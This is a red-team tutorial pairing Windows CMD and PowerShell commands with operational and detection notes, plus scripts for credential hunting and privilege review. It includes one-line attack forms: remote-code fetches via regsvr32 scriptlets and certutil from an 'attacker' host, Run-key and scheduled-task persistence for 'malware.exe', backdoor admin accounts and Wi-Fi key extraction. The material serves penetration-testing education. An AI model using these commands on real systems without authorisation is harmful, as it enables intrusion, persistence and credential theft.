Comprehensive Guide to Essential Windows Commands for Penetration Testers and Red Team Operators

The built-in Windows command-line tools do much of the work in a Windows engagement: reconnaissance, staging tools, privilege analysis, persistence and clean-up. This guide walks through the essential ones, giving a CMD form and a PowerShell form for each, with usage examples and the operational notes that matter to penetration testers and red team operators. Almost everything here is also what blue teams alert on, so each entry says where the noise is.

1. dir – List Files and Directories

The dir command is a fundamental tool for reconnaissance on Windows systems:

CMD Usage:

C:\> dir              # List files and directories
C:\> dir /s           # List files and directories recursively

PowerShell Usage:

PS C:\> Get-ChildItem  # List files and directories
PS C:\> Get-ChildItem -Recurse  # List files and directories recursively

Tip: Combine with findstr in CMD or Select-String in PowerShell to search for specific filenames or keywords.

2. cd – Change Directory

Navigating directories is essential for accessing target-specific files or locations:

CMD Usage:

C:\> cd Documents     # Change to "Documents" directory

PowerShell Usage:

PS C:\> Set-Location Documents  # Change to "Documents" directory

Tip: Quickly switch to directories containing sensitive data or configuration files.

3. echo – Display Text or Enable/Disable Command Echo

The echo command outputs text to the command prompt or can control command echoing:

CMD Usage:

C:\> echo Hello, world!  # Display text

PowerShell Usage:

PS C:\> Write-Output "Hello, world!"  # Display text

Tip: Utilize echo in batch files or Write-Output in PowerShell scripts.

4. mkdir – Create Directory

Creating directories is essential for organizing your tools, scripts, and findings:

CMD Usage:

C:\> mkdir Reports      # Create "Reports" directory

PowerShell Usage:

PS C:\> New-Item -ItemType Directory -Name Reports  # Create "Reports" directory

Tip: Organize your toolkit by creating folders for specific tasks or projects.

5. copy – Copy Files

copy duplicates files (directory trees need xcopy or robocopy); it is how tools are staged on a target and how evidence is pulled off it:

CMD Usage:

C:\> copy file.txt dir\   # Copy file.txt to dir\

PowerShell Usage:

PS C:\> Copy-Item file.txt dir\  # Copy file.txt to dir\

Tip: A copied file inherits the ACL of its destination folder and gets a fresh creation timestamp, which makes recent copies easy to spot; copying a tool onto a host also puts it on disk where AV can scan it, so prefer staging only what you need.

6. move – Move and Rename Files

Moving or renaming files is helpful for concealing your actions or modifying system behavior:

CMD Usage:

C:\> move file.txt newdir\  # Move file.txt to newdir\

PowerShell Usage:

PS C:\> Move-Item file.txt newdir\  # Move file.txt to newdir\

Tip: On the same NTFS volume move is a rename, so the file keeps its timestamps and ACL; across volumes it is a copy followed by a delete. Renaming a tool to a benign-looking name defeats only filename-based detections.

7. del – Delete Files

Deleting files removes artifacts you created, but deletion is not erasure:

CMD Usage:

C:\> del file.txt      # Delete file.txt

PowerShell Usage:

PS C:\> Remove-Item file.txt   # Delete file.txt

Tip: del skips the Recycle Bin but only unlinks the file; the data stays on disk until overwritten and is recoverable with forensic tools (cipher /w, covered later, overwrites free space). /f is needed for read-only files and /q suppresses the prompt on wildcard deletes.

8. type – Display File Contents

Displaying file contents helps understand system configurations and identify vulnerabilities:

CMD Usage:

C:\> type file.txt

PowerShell Usage:

PS C:\> Get-Content file.txt

Tip: Examine configuration files to uncover sensitive information or vulnerabilities.

9. notepad – Open Text Files with Notepad

Opening files with Notepad allows quick examination or modification of contents:

CMD Usage:

C:\> notepad file.txt

PowerShell Usage:

PS C:\> notepad file.txt

Tip: notepad is a GUI program and only works from an interactive desktop session. From a reverse shell or a remote command-execution tool it blocks the shell with a window you cannot reach, so read with type/Get-Content and write with echo/Set-Content instead.

10. findstr – Search for Strings in Files

Searching for text patterns is essential for identifying vulnerabilities or sensitive data:

CMD Usage:

C:\> type file.txt | findstr "pattern"

PowerShell Usage:

PS C:\> Get-Content file.txt | Select-String "pattern"

Tip: findstr takes file arguments directly, so the pipe through type is unnecessary; /s recurses into subdirectories, /i ignores case and /n prints line numbers. Sweeping a tree for words such as password, connectionString or apikey in .config, .ini and .xml files is one of the quickest wins after landing on a host.
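
The following is an added example, not code from the original article: the PowerShell form of a recursive credential hunt (Get-ChildItem plus Select-String, covering both the dir and findstr entries above). The sample files, their contents and the pattern list are constructed for the example; point $Root at a real directory to use it on an engagement.

```powershell
# Added example: recursive hunt for credential-looking strings, the PowerShell
# counterpart of "dir /s /b | findstr" and "findstr /s /i". The sample tree is
# constructed in a temp folder so the script runs offline.
$Root = Join-Path $env:TEMP ("hunt-" + [guid]::NewGuid().ToString('N'))
New-Item -ItemType Directory -Path (Join-Path $Root 'app\config') -Force | Out-Null

# Constructed sample data (not real credentials)
Set-Content -Path (Join-Path $Root 'app\config\web.config') -Value @'
<connectionStrings>
  <add name="Main" connectionString="Server=db01;User Id=svc_app;Password=Summer2024!" />
</connectionStrings>
'@
Set-Content -Path (Join-Path $Root 'app\settings.ini') -Value @'
[smtp]
host=mail.internal
apikey=sk_live_0000000000
'@
Set-Content -Path (Join-Path $Root 'readme.txt') -Value 'Nothing interesting here.'

# Extensions worth reading and regexes worth flagging (Select-String is case-insensitive by default)
$Include  = '*.config', '*.ini', '*.xml', '*.json', '*.txt', '*.ps1', '*.bat'
$Patterns = 'password\s*=', 'pwd\s*=', 'apikey\s*=', 'secret\s*=', 'connectionstring'

function Find-SensitiveString {
    param([string]$Path, [string[]]$Filter, [string[]]$Regex)
    # -Include only filters when combined with -Recurse; unreadable files are skipped silently
    Get-ChildItem -Path $Path -Recurse -File -Include $Filter -ErrorAction SilentlyContinue |
        Select-String -Pattern $Regex |
        Select-Object Path, LineNumber, @{ n = 'Line'; e = { $_.Line.Trim() } }
}

Find-SensitiveString -Path $Root -Filter $Include -Regex $Patterns | Format-Table -AutoSize -Wrap

Remove-Item -Path $Root -Recurse -Force
```

Select-String reports one match object per matching line, so a line that hits two patterns is listed once; add -AllMatches if you want every pattern named.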

11. tasklist – List Running Processes

Listing processes aids in identifying active applications and potential attack vectors:

CMD Usage:

C:\> tasklist         # List running processes

PowerShell Usage:

PS C:\> Get-Process   # List running processes

Tip: Detect suspicious processes or unauthorized applications.

12. taskkill – Terminate Processes

Terminating processes is vital for stopping unwanted or malicious applications:

CMD Usage:

C:\> taskkill /im process.exe /f  # Terminate a process by image name

PowerShell Usage:

PS C:\> Stop-Process -Name process -Force  # Terminate a process by name; Stop-Process takes the name without the .exe extension

Tip: Halt malicious processes or applications that pose a threat.

13. netstat – Display Network Statistics

Monitoring network connections helps identify open ports and network activities:

CMD Usage:

C:\> netstat -ano    # Display active network connections

PowerShell Usage:

PS C:\> Get-NetTCPConnection  # Display active network connections

Tip: Identify active connections and potential attack vectors.
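
As an added example (not from the original article), the following joins Get-NetTCPConnection to Get-Process so that every listening or established socket is shown with its owning process and image path, which is what netstat -anob prints. The column names and the sort order are this script's own choices.

```powershell
# Added example: map TCP sockets to owning processes, the PowerShell form of "netstat -anob".
# Build a PID -> process lookup once instead of calling Get-Process per socket.
$procs = @{}
Get-Process | ForEach-Object { $procs[$_.Id] = $_ }

function Get-SocketOwner {
    Get-NetTCPConnection -State Listen, Established | ForEach-Object {
        $p = $procs[[int]$_.OwningProcess]   # OwningProcess is UInt32; hashtable keys are Int32
        [pscustomobject]@{
            LocalAddress  = $_.LocalAddress
            LocalPort     = $_.LocalPort
            RemoteAddress = $_.RemoteAddress
            RemotePort    = $_.RemotePort
            State         = $_.State
            PID           = $_.OwningProcess
            Process       = $p.ProcessName   # $null when the PID has already exited
            Path          = $p.Path          # $null for processes this shell cannot open (e.g. elevated ones from a non-admin shell)
        }
    }
}

Get-SocketOwner | Sort-Object State, LocalPort | Format-Table -AutoSize
```

Listening sockets bound to 0.0.0.0 or :: with a process outside System32 are the rows worth a second look; an established connection to an unexpected remote port from a non-browser process is the other classic finding.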

14. ipconfig – Display IP Configuration

Viewing IP configuration aids in understanding network settings and potential vulnerabilities:

CMD Usage:

C:\> ipconfig         # Display IP configuration

PowerShell Usage:

PS C:\> Get-NetIPAddress  # Display IP configuration

Tip: ipconfig /all adds DNS servers, DHCP lease details and MAC addresses; Get-NetIPAddress covers only addresses, so pair it with Get-DnsClientServerAddress for DNS. Extra adapters (VPN, Hyper-V, a second NIC) hint at networks reachable for pivoting.

15. ping – Test Network Connectivity

Testing network connectivity helps identify live hosts and assess network latency:

CMD Usage:

C:\> ping google.com

PowerShell Usage:

PS C:\> Test-Connection google.com

Tip: ICMP echo is often filtered by the Windows firewall or by network gear, so no reply does not mean no host; when ping is silent, a TCP probe (Test-Connection -TcpPort in PowerShell 7, or a port scan) is the better liveness check.

16. nslookup – DNS Lookup

Performing DNS lookups is useful for resolving hostnames or IP addresses:

CMD Usage:

C:\> nslookup google.com

PowerShell Usage:

PS C:\> Resolve-DnsName google.com

Tip: Gather information about target systems through DNS records.

17. wmic – Windows Management Instrumentation Command-line

Interacting with Windows Management Instrumentation helps gather system information:

CMD Usage:

C:\> wmic process list brief

PowerShell Usage:

PS C:\> Get-WmiObject Win32_Process  # List processes

Tip: wmic is deprecated and is being removed from current Windows 11 releases, so do not depend on it; Get-CimInstance Win32_Process is the supported replacement, and Get-WmiObject itself is absent from PowerShell 7. WMI also reaches remote hosts (the -ComputerName parameter), which is why it doubles as a lateral-movement channel and is watched accordingly.

18. systeminfo – Display System Information

Viewing system information provides insights into the operating system and hardware:

CMD Usage:

C:\> systeminfo

PowerShell Usage:

PS C:\> Get-ComputerInfo

Tip: Gather details about the system, OS version, and installed updates.

19. reg query – Query Registry Information

Interacting with the Windows Registry assists in gathering system configuration details:

CMD Usage:

C:\> reg query HKLM\Software\Microsoft\Windows\CurrentVersion /v ProductName

PowerShell Usage:

PS C:\> Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion" -Name "ProductName"

Tip: Extract information from the registry, such as installed software or settings.

20. reg add and reg delete – Modify Registry Entries

Modifying registry entries aids in altering system configurations or disabling security settings:

CMD Usage:

C:\> reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Malware" /t REG_SZ /d "C:\malware.exe"

PowerShell Usage:

PS C:\> Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Malware" -Value "C:\malware.exe"

Tip: Values under Run execute at every logon of that user; HKCU entries need no admin rights, HKLM entries do. Run-key persistence is the first place every triage tool and autoruns listing looks, so treat it as cheap but loud.
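
The block below is an added example, not from the original article: it enumerates the Run and RunOnce keys that the reg add above writes to, for both the machine and the current user, and flags entries whose command lives outside the usual program directories. The key list and the "outside program dirs" heuristic are this script's own assumptions; Windows has many other autostart locations that it does not cover.

```powershell
# Added example: list Run/RunOnce autostart entries and flag unusual command paths.
$RunKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)

function Get-AutorunEntry {
    param([string[]]$Key)
    foreach ($k in $Key) {
        if (-not (Test-Path -Path $k)) { continue }
        # Get-ItemProperty returns every value in the key plus PS* metadata properties
        $values = Get-ItemProperty -Path $k
        foreach ($v in $values.PSObject.Properties) {
            if ($v.Name -like 'PS*') { continue }   # skip PSPath, PSChildName, PSProvider, ...
            [pscustomobject]@{
                Key     = $k
                Name    = $v.Name
                Command = $v.Value
                # Heuristic: anything not under Windows\ or Program Files\ deserves a look
                OutsideProgramDirs = ([string]$v.Value) -notmatch '^"?[A-Za-z]:\\(Windows|Program Files( \(x86\))?)\\'
            }
        }
    }
}

Get-AutorunEntry -Key $RunKeys | Format-Table -AutoSize -Wrap
```

Run it before planting an entry to see what is already there, and again afterwards to confirm the value landed under the hive you intended (a non-elevated shell can only write the HKCU keys).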

21. net user – Manage User Accounts

Managing user accounts is crucial for privilege escalation and lateral movement:

CMD Usage:

C:\> net user newuser newpassword /add  # Add a new user

PowerShell Usage:

PS C:\> New-LocalUser -Name newuser -Password (ConvertTo-SecureString -String "newpassword" -AsPlainText -Force) -AccountNeverExpires

Tip: Creating a local account needs local admin rights, so this is persistence, not escalation, and it is logged as Event ID 4720. net user on its own lists the local accounts and net user <name> shows one account's group memberships and last logon; both are read-only reconnaissance worth running first.

22. net localgroup – Manage Local Groups

Managing local groups is essential for privilege escalation and controlling system access:

CMD Usage:

C:\> net localgroup Administrators newuser /add  # Add user to Administrators group

PowerShell Usage:

PS C:\> Add-LocalGroupMember -Group "Administrators" -Member "newuser"

Tip: Adding a member to Administrators also needs admin rights and is logged as Event ID 4732. net localgroup Administrators by itself lists the current members, which tells you which accounts are worth targeting without changing anything.

23. net share – Manage Shared Resources

Managing shared resources helps identify vulnerabilities or lateral movement opportunities:

CMD Usage:

C:\> net share         # List shared resources

PowerShell Usage:

PS C:\> Get-SmbShare   # List shared resources

Tip: Identify exposed file shares for potential exploitation.

24. net use – Connect to Shared Resources

Connecting to shared resources assists in lateral movement and data exfiltration:

CMD Usage:

C:\> net use \\target\share /user:username password

PowerShell Usage:

PS C:\> New-SmbMapping -LocalPath "Z:" -RemotePath "\\target\share" -UserName username -Password password  # -Password is a plain string here, not a SecureString

Tip: Credentials typed on the command line end up in console history and PowerShell script-block logs. A mapped drive letter persists until removed (net use Z: /delete), and each connection produces a logon event on the target.

26. route – Display or Modify Network Routing

Displaying or modifying network routing is useful for pivoting or network manipulation:

CMD Usage:

C:\> route print      # Display routing table

PowerShell Usage:

PS C:\> Get-NetRoute  # Display routing table

Tip: route add needs an elevated prompt and is lost at reboot unless -p is given. The existing table shows which subnets the host can reach directly, which is what matters when choosing a pivot.

27. netsh – Network Shell

Interacting with network settings and configurations helps manipulate network behavior:

CMD Usage:

C:\> netsh wlan show profiles         # Display Wi-Fi profiles

PowerShell Usage:

PS C:\> netsh wlan show profiles    # netsh is an executable, so the same command works unchanged from PowerShell
PS C:\> Get-NetConnectionProfile   # Category (Public/Private/Domain) of the active connections, not the saved Wi-Fi profiles

Tip: netsh wlan show profiles lists saved SSIDs; showing a single profile with key=clear prints its stored pre-shared key (this may require an elevated prompt on current builds). The same tool's advfirewall context lists and edits Windows Firewall rules, and changes there need admin rights.

28. whoami – Display User and Group Information

Displaying user and group information helps understand available privileges:

CMD Usage:

C:\> whoami

PowerShell Usage:

PS C:\> whoami /groups   # whoami.exe is not a cmdlet; the same executable runs from either shell

Tip: whoami /groups shows group memberships and the integrity level; whoami /priv shows token privileges, which are what matter for escalation (SeImpersonatePrivilege, SeDebugPrivilege, SeBackupPrivilege and similar). whoami /all prints everything at once. Being in Administrators is not the same as running elevated: check the integrity level.
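
As an added example that is not part of the original article, the following parses whoami's CSV output into objects, reports the token's integrity level and whether the Administrators SID is present, and flags privileges that are well-known escalation primitives. The list in $Interesting is this script's own assumption, not an exhaustive catalogue.

```powershell
# Added example: summarise the current token from "whoami /groups" and "whoami /priv".
$Interesting = @(
    'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeDebugPrivilege',
    'SeBackupPrivilege', 'SeRestorePrivilege', 'SeTakeOwnershipPrivilege',
    'SeLoadDriverPrivilege', 'SeTcbPrivilege', 'SeCreateTokenPrivilege',
    'SeManageVolumePrivilege'
)

function Get-TokenSummary {
    # /fo csv gives machine-readable output that ConvertFrom-Csv turns into objects
    $groups = whoami /groups /fo csv | ConvertFrom-Csv
    $privs  = whoami /priv   /fo csv | ConvertFrom-Csv

    # The integrity level is reported as a pseudo-group named "Mandatory Label\..."
    $integrity = ($groups | Where-Object { $_.'Group Name' -like 'Mandatory Label\*' }).'Group Name'
    # S-1-5-32-544 is BUILTIN\Administrators; in a filtered (non-elevated) token it is present but "used for deny only"
    $adminSid  = [bool]($groups | Where-Object { $_.SID -eq 'S-1-5-32-544' })

    [pscustomobject]@{
        User                  = (whoami)
        Integrity             = $integrity
        AdministratorsInToken = $adminSid
        # A privilege listed as Disabled is still held; the process can enable it via AdjustTokenPrivileges
        InterestingPrivileges = @($privs |
            Where-Object { $Interesting -contains $_.'Privilege Name' } |
            ForEach-Object { '{0} ({1})' -f $_.'Privilege Name', $_.State })
    }
}

Get-TokenSummary | Format-List
```

A medium-integrity token with AdministratorsInToken set to true means UAC is the only thing in the way; a service account holding SeImpersonatePrivilege is the textbook starting point for token-impersonation escalation.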

30. driverquery – Display Installed Device Drivers

Listing installed device drivers aids in identifying potential vulnerabilities:

CMD Usage:

C:\> driverquery

PowerShell Usage:

PS C:\> Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion

Tip: Identify outdated or vulnerable device drivers for exploitation.

31. sc – Service Control

Interacting with Windows services helps control system behavior and persistence:

CMD Usage:

C:\> sc query          # List running services (add "state= all", with the space after =, to include stopped ones)

PowerShell Usage:

PS C:\> Get-Service    # List all services, running or stopped

Tip: In PowerShell sc is an alias for Set-Content, so call sc.exe explicitly. sc qc <name> shows a service's binary path and logon account, which is the read-only check to run first; creating, reconfiguring or stopping services needs rights on the service object, which in practice means local admin. Stopping a security product's service is loud and commonly blocked by tamper protection.
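
The block below is an added example, not code from the original article. It lists every service with its binary path and logon account (what sc qc shows per service) through CIM, and flags two classic misconfigurations: an unquoted image path containing spaces, and a binary outside the Windows and Program Files directories. The split-on-.exe heuristic and the directory allow-list are this script's own assumptions.

```powershell
# Added example: review service binaries for unquoted paths and unusual locations.
function Get-ServiceReview {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = [string]$_.PathName              # may be empty for some services
        $exe  = ($path -split '(?i)\.exe')[0]    # everything up to the first ".exe" is the image path
        [pscustomobject]@{
            Name           = $_.Name
            State          = $_.State
            StartMode      = $_.StartMode
            Account        = $_.StartName
            Path           = $path
            # Unquoted and containing a space: Windows tries each space-delimited prefix as the executable
            UnquotedSpace  = ($exe -notmatch '^"') -and ($exe -match '\s')
            # Outside Windows\ or Program Files\: worth checking who can write to that directory
            NonStandardDir = $path -notmatch '^"?[A-Za-z]:\\(Windows|Program Files( \(x86\))?)\\'
        }
    }
}

Get-ServiceReview |
    Where-Object { $_.UnquotedSpace -or $_.NonStandardDir } |
    Format-Table Name, State, StartMode, Account, UnquotedSpace, Path -AutoSize -Wrap
```

A flagged row is only a lead: the finding is real only if the service runs as SYSTEM (or another privileged account) and you can write to the directory where Windows would look first.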

32. schtasks – Schedule Tasks

Scheduling tasks aids in persistence and automated exploitation:

CMD Usage:

C:\> schtasks /create /tn "MyTask" /tr "malicious.exe" /sc daily /st 00:00

PowerShell Usage:

PS C:\> Register-ScheduledTask -TaskName "MyTask" -Action (New-ScheduledTaskAction -Execute "malicious.exe") -Trigger (New-ScheduledTaskTrigger -Daily -At 00:00)

Tip: A task that should run as SYSTEM (/ru SYSTEM) needs an elevated prompt; a standard user can still register tasks that run as themselves. Task creation is logged as Event ID 4698 where object-access auditing is enabled, and the task definition is written as XML under C:\Windows\System32\Tasks, which is where defenders look.

33. regsvr32 – Register and Unregister DLLs

Registering or unregistering DLLs can aid in executing malicious code or maintaining persistence:

CMD Usage:

C:\> regsvr32 /s /i:http://attacker/evil.sct scrobj.dll  # Register with remote content

PowerShell Usage:

PS C:\> regsvr32 /s /i:http://attacker/evil.sct scrobj.dll   # No cmdlet equivalent; the same binary runs from PowerShell
PS C:\> rundll32.exe malicious.dll,EntryPoint               # Related: call an exported function of a DLL directly

Tip: The commonly documented form of the scriptlet technique adds /n /u so that only DllInstall, which receives the /i: string, is called. regsvr32 and rundll32 are signed Microsoft binaries, which is the appeal; it is also why command lines that pair them with URLs or DLLs in unusual paths are widely signatured. DLL hijacking is a separate technique: planting a DLL where a trusted program loads it by name.

34. cipher – Manage File Encryption

cipher manages EFS encryption on files and directories and can also overwrite free space:

CMD Usage:

C:\> cipher /e /a filename.txt    # Encrypt a file with EFS (/a is required for files; without it cipher operates on directories)

PowerShell Usage:

PS C:\> (Get-Item filename.txt).Encrypt()   # Same EFS operation through .NET's FileInfo.Encrypt()

Tip: EFS ties the file to the current user's certificate, so it offers nothing for exfiltration. cipher with no arguments reports which files in the current directory are encrypted, and cipher /w:<dir> overwrites free space on that volume, which is what turns a del into an actual wipe (it takes a long time and is itself an obvious anti-forensics signal).

37. powercfg – Power Configuration

Interacting with power configurations can assist in controlling system behavior and persistence:

CMD Usage:

C:\> powercfg /hibernate off      # Disable hibernation

PowerShell Usage:

PS C:\> Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Power" -Name "HibernateEnabled" -Value 0

Tip: powercfg /hibernate off needs an elevated prompt and deletes hiberfil.sys, a file that holds a copy of RAM and is a standard memory-forensics source. powercfg /change (alias /x) raises sleep and display timeouts, which keeps a foothold reachable on a laptop that would otherwise suspend.

39. msfconsole – Metasploit Framework Console

Metasploit is not a Windows component; on a Windows attacker host the installer puts msfconsole (a .bat wrapper) on the PATH:

CMD and PowerShell Usage:

C:\> msfconsole

Tip: msfconsole normally runs on the operator's machine, not the target. Its default payloads and staged connections are heavily signatured by endpoint products, so expect to customise them for anything beyond a lab.

40. certutil – Certificate Utility (Abused as a File Downloader)

certutil manages certificates, but its -urlcache, -encode/-decode and -hashfile switches make it a living-off-the-land downloader, base64 codec and hashing tool:

CMD Usage:

C:\> certutil -urlcache -f http://attacker/malicious.exe C:\malicious.exe

PowerShell Usage:

PS C:\> Invoke-WebRequest -Uri http://attacker/malicious.exe -OutFile C:\malicious.exe

Tip: certutil -urlcache -f with an http URL is among the most heavily signatured LOLBin patterns, so expect an EDR alert. certutil -decode turns a base64 text file back into a binary and certutil -hashfile <file> SHA256 verifies what you pulled down. Invoke-WebRequest avoids the certutil signature but is captured by PowerShell script-block logging where that is enabled.

41. nmap – Network Mapping and Port Scanning

Nmap is a third-party scanner rather than a Windows tool, but it is the standard way to map a network from a Windows host once installed:

CMD and PowerShell Usage:

C:\> nmap -sV -p 1-1000 target

Tip: -sV probes each open port for a service banner, which is noisier than a plain SYN scan; add -Pn when ICMP is filtered so hosts are not skipped as "down". Scanning from a compromised host is quickly noticed by network detection, so scope it tightly.

Mastering these Windows commands is a crucial step toward becoming a skilled penetration tester or red team operator. By honing your skills with these tools, you'll be well-equipped to navigate a variety of scenarios, from reconnaissance to exploitation and beyond. As you continually refine your abilities, delve into more advanced Windows concepts and expand your toolkit, you'll develop the expertise needed to excel in the dynamic field of cybersecurity. Best of luck in your journey of penetration testing and red teaming!